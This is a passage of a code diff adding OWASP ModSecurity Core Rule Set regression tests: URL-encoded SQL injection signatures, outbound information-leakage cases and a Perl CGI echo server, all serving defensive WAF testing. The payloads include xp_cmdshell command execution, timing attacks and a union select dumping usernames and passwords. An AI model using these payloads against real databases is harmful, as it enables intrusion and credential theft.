%var sig=1'%20or%201%3D(%40%40version%20)%3Bexec%20master..xp_cmdshell
%endtest
%test Detects MySQL comment-/space-obfuscated injections and backtick termination (981257)
########################################
%output 981257
%var sig=1%0bAND(SELECT%0b1%20FROM%20mysql.x)
%endtest
%test Detects chained SQL injection attempts 1/2 (981248)
########################################
%output 981248
%var sig=0%20div%201%20-%20union%23foo*%2F*bar%0Aselect%23foo%0A1%2C2%2Ccurrent_user
%endtest
%test Detects SQL benchmark and sleep injection attempts including conditional queries (981250)
########################################
%output 981250
%var sig=SELECT%20BENCHMARK(1000000%2CMD5(%E2%80%98A%E2%80%99))%3B
%var sig=SELECT%20SLEEP(5)%3B%20%23%20%3E%3D%205.0.12
%endtest
%test Detects conditional SQL injection attempts (981241)
########################################
%output 981241
%var sig=1194%20or%201%20group%20by%20concat(version()%2Cfloor(rand(0)*2))having%20min(0)%20or%201--
%endtest
%test Detects MySQL charset switch and MSSQL DoS attempts (981252)
########################################
%output 981252
%var sig=-1'%3B%20if%20'1'%3D'1'%3B%20waitfor%20time%20'00%3A00%3A01'--
%endtest
%test Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections (981256)
########################################
%output 981256
%var sig=-148)%20or%201%20group%20by%20concat(%40%40version%2Cfloor(rand(0)*2))%20having%20min(0)%20or%201%20--
%endtest
%test Detects basic SQL authentication bypass attempts 2/3 (981245)
########################################
%output 981245
%var sig=-121%20union%20all%20select%201%2Cgroup_concat(Username%2C0x3a%2CPassword%2C0x3a%2CUserGroup)%2C3%2C4%2C5%20from%20uvp_Users
%var sig=-10'%20union%20select%201%2Cconcat_ws(0x3a%2Ctable_name%2Ctable_schema)%2C3%20from%20information_schema.columns%20where%20column_name%20like%20'name'%23
%endtest

140
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_50_outbound.tests Normal file
View File

@@ -0,0 +1,140 @@
# FILE 50
%timeout 10
%test weblogic information disclosure
########################################
%event 970021
%output 970021
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Status: 500 Internal Server Error
Response-Content: <title>JSP compile error</title>
%endtest
%test Zope information leakage
########################################
%event 970007
%output 970007
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <h2>Site Error</h2> <p>An error was encountered while publishing this resource.
%endtest
%test CF information leakage
########################################
%event 970008
%output 970008
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: The error occurred in script.cfm: line 11 bla bla bla Please try the following: <br> Check the ColdFusion documentation to verify that you are using the correct syntax. bla bla Stack Trace (click to expand)
%endtest
%test PHP information leakage
########################################
%event 970009
%output 970009
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <b>Warning</b> mysql_fetch_row(): supplied argument ... in /web/jvcjazz/intl_view.php on line 142
%endtest
%test ISA server existence revealed
########################################
%event 970010
%output 970010
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: 403 Forbidden - The ISA Server denies the specified Uniform Resource ...bla bla bla... Internet Security and Acceleration Server
%endtest
%test Local file link
########################################
%event 970011
%output 970011
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <a href="c:\\documents\\sensitive.doc">This is my sensitive data, do not touch</a>
%endtest
%test Microsoft office doc properties leakage
########################################
%event 970012
%output 970012
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <o:documentproperties>
%endtest
%test Directory Listing (apache)
########################################
%event 971200
%output 971200
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <html> <head> <title>Index of /~avi</title> </head> <body><h1>Index of /~avi</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/~avi/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="03.17/">03.17/</a> </td><td align="right">21-Jul-2007 17:20 </td><td align="right"> - </td></tr>
%endtest
%test CF source code leakage
########################################
%event 970016
%output 970016
%request
GET /cgi-bin/testserver.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
Response-Content: <cf
%endtest

18
iis/ModSecurityIIS/owasp_crs/util/regression_tests/testserver.cgi Normal file
View File

@@ -0,0 +1,18 @@
#!/usr/bin/perl
use CGI qw/:standard/;
$response_status = http('Response-Status') || "200 OK";
$response_content = http('Response-Content');
$response_type = http('Response-Content-Type') || "text/html";
$response_new_header_name = http('Response-Header-Name');
$response_new_header_value = http('Response-Header-Value');
$response_new_header = defined($response_new_header_name) ? $response_new_header_name . ': ' . $response_new_header_value : undef;
if (defined($response_new_header)) {
print header ($response_type, $response_status, undef, undef, undef, undef, undef, undef, undef,$response_new_header);
} else {
print header ($response_type, $response_status);
}
print start_html('rule set tester');
print h1('rule set tester');
print $response_content;